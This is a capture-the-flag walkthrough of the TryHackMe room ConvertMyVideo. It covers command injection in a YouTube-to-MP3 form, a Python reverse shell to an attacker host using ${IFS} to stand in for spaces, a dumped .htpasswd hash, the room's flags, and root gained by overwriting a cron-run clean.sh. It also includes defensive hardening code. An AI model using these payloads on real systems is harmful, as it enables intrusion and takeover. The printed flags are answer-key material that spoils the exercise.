TryHackMe "ConvertMyVideo"

April 22nd, 2023


Introduction

ConvertMyVideo is a medium-difficulty TryHackMe room released on May 2nd, 2020 by overjt.

User Own

What is the name of the secret folder?

Nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 15:25 EDT
Nmap scan report for 10.10.xx.xx
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 651bfc741039dfddd02df0531ceb6dec (RSA)
|   256 c42804a5c3b96a955a4d7a6e46e214db (ECDSA)
|_  256 ba07bbcd424af293d105d0b34cb1d9b1 (ED25519)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3737/tcp filtered xpanel
5850/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

The host serves a website that converts YouTube videos to MP3 files. Running ffuf against it reveals a subdirectory called admin, which answers with HTTP 401 (authentication required).

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.xx.xx/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2563ms]
    * FUZZ: .htpasswd

[Status: 401, Size: 460, Words: 42, Lines: 15, Duration: 163ms]
    * FUZZ: admin

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
    * FUZZ: .hta

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
    * FUZZ: .htaccess

[Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: images

[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 158ms]
    * FUZZ: js

[Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5429ms]
    * FUZZ: index.php

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: server-status

[Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: tmp

:: Progress: [4713/4713] :: Job [1/1] :: 178 req/sec :: Duration: [0:00:32] :: Errors: 0 ::

What is the user to access the secret folder?

The website takes a YouTube video ID as input. Submitting an empty ID returns an error from youtube-dl, which reveals that the backend invokes it. The site's JavaScript in main.js shows that the ID is simply concatenated onto the base YouTube watch URL and POSTed as yt_url.

$(function () {
    $("#convert").click(function () {
        $("#message").html("Converting...");
        $.post("/", { yt_url: "https://www.youtube.com/watch?v=" + $("#ytid").val() }, function (data) {
            try {
                data = JSON.parse(data);
                if(data.status == "0"){
                    $("#message").html("<a href='" + data.result_url + "'>Download MP3</a>");
                }
                else{
                    console.log(data);
                    $("#message").html("Oops! something went wrong");
                }
            } catch (error) {
                console.log(data);
                $("#message").html("Oops! something went wrong");
            }
        });
    });

});

Using the input --;id; shows that the website is vulnerable to command injection: the id command runs on the server and its output is returned in the JSON response.

{
  "status": 127,
  "errors": "WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nUsage: youtube-dl [OPTIONS] URL [URL...]\n\nyoutube-dl: error: You must provide at least one URL.\nType youtube-dl --help to see a list of all options.\nsh: 1: -f: not found\n",
  "url_orginal": "--;id;",
  "output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
  "result_url": "/tmp/downloads/6444366a5e64a.mp3"
}
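The injection works because the video ID is pasted into a shell command string. The fix is to allow-list the ID and hand youtube-dl an argv list with no shell in between. The following is an added example, not code from the room or from this write-up; the option set passed to youtube-dl, the output directory and the 11-character ID alphabet are my assumptions about a typical converter backend.

```python
from __future__ import annotations

import re
import subprocess

# Assumption: YouTube video IDs are 11 characters drawn from [A-Za-z0-9_-].
YOUTUBE_ID_RE = re.compile(r"[A-Za-z0-9_-]{11}")
YOUTUBE_WATCH = "https://www.youtube.com/watch?v="


def is_valid_youtube_id(ytid: str) -> bool:
    """Allow-list check: anything outside the ID alphabet is rejected before it
    gets anywhere near a command line. '--;id;' and '${IFS}' fail here."""
    return YOUTUBE_ID_RE.fullmatch(ytid) is not None


def vulnerable_command_string(ytid: str) -> str:
    """The pattern the room's backend exhibits: user input interpolated into a
    string that is later given to /bin/sh. Returned for comparison only, never run.
    (Assumed shape; the room's exact command is not visible.)"""
    return f"youtube-dl -x --audio-format mp3 {YOUTUBE_WATCH}{ytid}"


def build_download_argv(ytid: str, out_dir: str = "/tmp/downloads") -> list[str]:
    """Return an argv list for youtube-dl (assumed options). No shell is involved,
    so ';', '$' and '${IFS}' are ordinary bytes inside one argument, and the '--'
    stops option parsing so an ID beginning with '-' cannot be read as a flag."""
    if not is_valid_youtube_id(ytid):
        raise ValueError(f"rejected YouTube ID: {ytid!r}")
    return [
        "youtube-dl",
        "-x", "--audio-format", "mp3",
        "-o", f"{out_dir}/%(id)s.%(ext)s",
        "--",
        YOUTUBE_WATCH + ytid,
    ]


def id_is_rejected(ytid: str) -> bool:
    """True when the hardened builder refuses the input."""
    try:
        build_download_argv(ytid)
    except ValueError:
        return True
    return False


def run_conversion(ytid: str, *, dry_run: bool = True):
    """Execute the conversion with subprocess.run(argv) and no shell=True.
    dry_run returns the argv instead of invoking youtube-dl (not installed here)."""
    argv = build_download_argv(ytid)
    if dry_run:
        return argv
    return subprocess.run(argv, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    print(run_conversion("AbCdEfGhIjK"))          # constructed sample ID
    print(id_is_rejected("--;id;"))               # True: the room's probe is refused
```

The allow-list alone would stop the payload from the write-up; the argv list and the `--` separator are defence in depth so that a future relaxation of the regex does not reintroduce either shell metacharacter or option injection.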

A Python reverse shell can be used to get in as www-data.

Input
--;python${IFS}-c${IFS}'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.xx.xx",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")';
Terminal
nc -nvlp 1234            
listening on [any] 1234 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 43554
$ id    
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
ls
admin  images  index.php  js  style.css  tmp

Checking the admin directory:

ls admin -a
.  ..  .htaccess  .htpasswd  flag.txt  index.php

The contents of .htpasswd are:

$ cat admin/.htpasswd   
cat admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/

The admin page is protected by HTTP basic authentication with the username itsmeadmin and the password hash shown above (an Apache $apr1$ MD5 hash).

What is the user flag?

The user flag is inside the admin directory.

$ cat admin/flag.txt
cat admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}

The flag is flag{0d8486a0c0c42503bb60ac77f4046ed7}.

System Own

What is the root flag?

Inside tmp is a file called clean.sh, which root runs periodically to remove the downloaded files. Because www-data can write to it, replacing its contents with a reverse shell will eventually get you in as root.

Terminal 1

python3 -m http.server 80

Terminal 2

wget http://10.6.xx.xx/clean.sh -O clean.sh
--2023-04-22 20:00:08--  http://10.6.xx.xx/clean.sh
Connecting to 10.6.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49 [text/x-sh]
Saving to: 'clean.sh'

clean.sh            100%[===================>]      49  --.-KB/s    in 0s      

2023-04-22 20:00:09 (8.09 MB/s) - 'clean.sh' saved [49/49]

Terminal 3

nc -nvlp 1235    
listening on [any] 1235 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 54788
mesg: ttyname failed: Inappropriate ioctl for device
cat /root/root.txt
flag{d9b368018e912b541a4eb68399c5e94a}

The root flag inside /root/root.txt is flag{d9b368018e912b541a4eb68399c5e94a}.
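The root step works only because a script that root executes on a schedule is writable by the web user. The check below is an added example, not part of the room or this write-up: it audits a script path the way a hardening review would, flagging untrusted ownership, group/other write bits and a replaceable parent directory, and demonstrates the findings on a constructed clean.sh in a temporary directory. The script contents and the 0o666 mode are my constructed stand-ins for what the room has.

```python
import os
import stat
import tempfile
from pathlib import Path

GROUP_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def audit_privileged_script(path: str, trusted_uids: frozenset = frozenset({0})) -> list:
    """Return findings explaining why `path` is unsafe to run from a privileged
    scheduler (cron, systemd timer). An empty list means nothing obvious is wrong."""
    findings = []
    p = Path(path)
    st = p.lstat()
    if stat.S_ISLNK(st.st_mode):
        findings.append("script is a symlink; its target can be swapped")
        st = p.stat()
    if st.st_uid not in trusted_uids:
        findings.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & GROUP_OTHER_WRITE:
        findings.append(f"writable by group/other (mode {stat.filemode(st.st_mode)})")
    parent = p.parent.stat()
    if parent.st_mode & GROUP_OTHER_WRITE and not parent.st_mode & stat.S_ISVTX:
        # Without the sticky bit anyone with write access to the directory can unlink
        # and recreate the script, even if the file itself is root-owned and 0644.
        findings.append("parent directory is group/other-writable without the sticky bit")
    return findings


def harden_script_mode(path: str) -> str:
    """Remove group/other write bits (chown to root is left to the operator). Returns the new mode."""
    mode = stat.S_IMODE(os.stat(path).st_mode) & ~GROUP_OTHER_WRITE
    os.chmod(path, mode)
    return stat.filemode(os.stat(path).st_mode)


def demo() -> dict:
    """Constructed scenario: a cleanup script first left world-writable, as in the
    room, then hardened. Ownership findings depend on who runs this, so the mode
    findings are the stable part."""
    workdir = tempfile.mkdtemp()                      # mode 0700, so no parent finding
    script = os.path.join(workdir, "clean.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\nrm -f /tmp/downloads/*\n")   # constructed stand-in content
    os.chmod(script, 0o666)
    weak = audit_privileged_script(script)
    hardened_mode = harden_script_mode(script)
    hardened = audit_privileged_script(script)
    return {"weak": weak, "hardened": hardened, "hardened_mode": hardened_mode}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run the audit over every command path found in /etc/crontab, /etc/cron.d and root's crontab; any path that produces findings is a privilege-escalation route of exactly the kind used in this room.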

And that's the room!

Note: Spaces invalidate any command, so the string ${IFS} can be used as a substitute for a space.